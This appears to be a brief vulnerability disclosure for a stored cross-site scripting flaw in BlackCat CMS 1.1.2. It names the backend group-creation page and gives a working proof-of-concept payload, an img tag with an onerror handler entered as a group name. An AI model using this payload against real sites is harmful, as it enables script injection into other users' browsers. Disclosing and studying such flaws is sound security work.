?# Affected software: black cat cms # Type of vulnerability:stored xss # URL:http://blackcat-cms.org/ # Discovered by: provensec # Website: provensec.com #version:BlackCat CMS 1.1.2 # Proof of concept? goto ad group page http://demo.opensourcecms.com/blackcat/backend/groups/index.php and and new group with name as xss payload "><img src=d onerror=confirm(1);> and javascript will execute